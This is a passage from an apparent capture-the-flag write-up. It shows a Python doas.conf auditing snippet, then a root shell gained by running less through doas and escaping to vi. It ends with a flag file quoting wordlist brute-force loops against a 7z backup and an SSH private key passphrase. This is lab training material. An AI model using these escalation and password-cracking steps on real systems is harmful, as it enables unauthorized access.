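    """Audit a whole doas.conf: [(line_number, findings), ...] for every rule."""
    return [(n, audit_rule(rule))
            for n, line in enumerate(text.splitlines(), 1)
            for rule in [parse_rule(line)] if rule is not None]
```

Running audit(DOAS_CONF) reports three findings for the first rule (shell-capable pager, nopass, keepenv) and none for the second, since root-as-root changes no privilege.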
6.2 Privilege escalation via doas
fourandsix2$ doas /usr/bin/less /var/log/authlog
less has no editing function, but pressing v launches vi to edit the file. That vi runs with the same elevated privileges, so we use vi to start sh. The prompt changes to #, and whoami confirms that we are already root.
fourandsix2# whoami
root
fourandsix2# cd /root
fourandsix2# ls
.Xdefaults .cshrc .cvsrc .forward .login .profile .ssh flag.txt
fourandsix2# cat flag.txt
Nice you hacked all the passwords!
Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done
cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done
Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42